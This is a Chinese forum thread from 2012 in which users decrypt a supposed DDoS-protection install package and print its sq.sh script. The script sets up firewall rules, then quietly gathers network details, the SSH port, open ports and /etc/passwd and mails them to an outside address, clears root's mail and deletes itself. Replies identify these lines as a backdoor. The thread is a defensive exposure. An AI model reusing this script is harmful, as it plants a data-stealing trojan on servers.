找回密码
 立即注册
搜索
热搜: 活动 交友 discuz
查看: 145|回复: 17

这里是维基解密。

[复制链接]

77

主题

1138

回帖

2537

积分

金牌会员

积分
2537
发表于 2012-6-2 07:24:01 | 显示全部楼层 |阅读模式
上次你们说那个什么DDoS一键包,我解密了,大家可以参考一下

ddosinstall.sh内容:
"
回复

使用道具 举报

77

主题

1138

回帖

2537

积分

金牌会员

积分
2537
 楼主| 发表于 2012-6-2 07:24:52 | 显示全部楼层
其中,z.sh的内容:
"
回复

使用道具 举报

77

主题

1138

回帖

2537

积分

金牌会员

积分
2537
 楼主| 发表于 2012-6-2 07:26:07 | 显示全部楼层
其中sq.sh内容(这里他做坏事了):
#!/bin/bash
cat >>/etc/sysctl.confa.txt
ulimit -SHn 65535
/sbin/sysctl -w net.ipv4.ip_forward=1 >a.txt
/etc/init.d/iptables save >a.txt
mv /etc/sysconfig/iptables /etc/sysconfig/iptables.bak
/sbin/service iptables restart >a.txt
/sbin/iptables -F
/sbin/iptables -X
/sbin/iptables -Z
/sbin/iptables -N input_ext
/sbin/iptables -F input_ext
modprobe ipt_ttl
modprobe xt_limit
modprobe xt_tcpudp
modprobe ipt_length
modprobe ipt_pkttype
modprobe ipt_recent
/sbin/iptables -A INPUT -i lo -j ACCEPT
/sbin/iptables -A OUTPUT -o lo -j ACCEPT
/sbin/iptables -A FORWARD -p tcp --tcp-flags SYN,ACK,FIN,RST RST -m limit --limit 1/s -j ACCEPT
/sbin/iptables -A FORWARD -p icmp --icmp-type echo-request -m limit --limit 1/s -j ACCEPT
ping
/sbin/iptables -I INPUT -p icmp --icmp-type echo-request -m length --length 84 -j DROP
/sbin/iptables -I INPUT -p icmp --icmp-type echo-request -m length --length 87:65535 -j DROP
/sbin/iptables -I input_ext -m pkttype --pkt-type broadcast -j DROP
/sbin/iptables -I INPUT -p tcp --syn -m limit --limit 2/s -j ACCEPT
/sbin/iptables -I INPUT -p tcp --syn -m ttl --ttl-gt 241 -j DROP
/sbin/iptables -I INPUT -p tcp --syn -m ttl --ttl-lt 34 -j DROP
/sbin/iptables -I INPUT -p udp -m length --length 3001:65535 -j DROP
/sbin/iptables -I INPUT -p udp -m length --length :40 -j DROP
/sbin/iptables -I INPUT -p tcp --syn -m length --length :40 -j DROP
#/sbin/iptables -I INPUT -p tcp --syn -m length --length 60 -j DROP
/sbin/iptables -I INPUT -p tcp --syn -m length --length 78 -j DROP
/sbin/iptables -I INPUT -p tcp --syn -m length --length 3001:65535 -j DROP
/sbin/iptables -I INPUT -p tcp --syn -m ttl --ttl-eq 128 -j DROP
/sbin/iptables -I INPUT -p udp -m udp --dport 161 -j ACCEPT
#/sbin/iptables -I OUTPUT -p udp -j DROP
/sbin/iptables -I OUTPUT -p udp -m udp --sport 161 -j ACCEPT
/sbin/iptables -I INPUT -s 127.0.0.1 -j ACCEPT
/etc/init.d/iptables save >a.txt
/sbin/chkconfig --level 345 iptables on
##crontab -e
cat >>/var/spool/cron/roota.txt
sqnetwork=`/sbin/ifconfig|grep HWaddr|awk '{print $5}'|sed -n '1,1p'`
quanxian=`echo "$sqnetwork"|md5sum|awk '{print $1}'|md5sum|awk '{print $1}'`
touch /etc/sysconfig/console/$quanxian
touch /etc/sysconfig/console/network
cat /dev/null >/var/spool/mail/root
echo "unset MAILCHECK">> /etc/profile
source /etc/profile
/sbin/service sendmail restart >a.txt
echo "wait......."
mailtxt=`ifconfig`
sshprot=`cat /etc/ssh/sshd_config |grep Port`
duankou=`netstat -atln`
yonghu=`cat /etc/passwd`
ip=`ifconfig | sed -n '2,2p'|awk '{print $2}'|awk -F : '{print $2}'`
/usr/lib/sendmail -t
To: swm9988@126.com
Subject: install-IP$ip
---------------------------------
$mailtxt
---------------------------------
$sshprot
---------------------------------
$duankou
_________________________________
$yonghu
---------------------------------
echo "install to..."
sleep 5
/sbin/service sendmail stop >a.txt
echo "The server license has been completed."
rm -rf a.txt
cat >>/etc/rc.local/data/firewall/class.txt
echo "192.168|127.0.0.1">>/data/firewall/class.txt
rm -rf /data/firewall/sq.sh
回复

使用道具 举报

925

主题

9571

回帖

2万

积分

论坛元老

积分
21947
发表于 2012-6-2 07:26:19 | 显示全部楼层
s.sh解密了没东西,不知道是不是我的系统问题

i.sh解密内容:
"


d.sh内容:
"


bai.sh无法解密

updata.sh无法解密
回复

使用道具 举报

77

主题

1138

回帖

2537

积分

金牌会员

积分
2537
 楼主| 发表于 2012-6-2 07:28:07 | 显示全部楼层
膜拜

回复

使用道具 举报

95

主题

2785

回帖

5907

积分

论坛元老

积分
5907
发表于 2012-6-2 07:30:51 | 显示全部楼层
很牛.
回复

使用道具 举报

175

主题

2429

回帖

5403

积分

论坛元老

积分
5403
发表于 2012-6-2 07:39:56 | 显示全部楼层
本帖最后由 lazyzhu 于 2012-6-2 07:56 编辑





还有个uninstall.sh,看看有没后门
回复

使用道具 举报

497

主题

9633

回帖

2万

积分

论坛元老

积分
20793
发表于 2012-6-2 07:54:35 | 显示全部楼层



黑客啊

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

×
回复

使用道具 举报

304

主题

3081

回帖

7102

积分

论坛元老

积分
7102
发表于 2012-6-2 07:57:30 | 显示全部楼层
我就说了是假的东西,感谢楼主解密,该加分

亮点在

sshprot=`cat /etc/ssh/sshd_config |grep Port`
duankou=`netstat -atln`
yonghu=`cat /etc/passwd`
ip=`ifconfig | sed -n '2,2p'|awk '{print $2}'|awk -F : '{print $2}'`
/usr/lib/sendmail -t
To: swm9988@126.com
这个用C#写的吗?语法太恶心了
回复

使用道具 举报

0

主题

2

回帖

6

积分

新手上路

积分
6
发表于 2012-6-2 08:12:05 | 显示全部楼层

Zuckerberg 发表于 2012-6-2 08:15



这个用C#写的吗?语法太恶心了

bash
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver|手机版|小黑屋|Discuz! X

GMT+8, 2025-1-11 14:58 , Processed in 0.019689 second(s), 5 queries , Gzip On, Redis On.

Powered by Discuz! X3.5

© 2001-2024 Discuz! Team.

快速回复 返回顶部 返回列表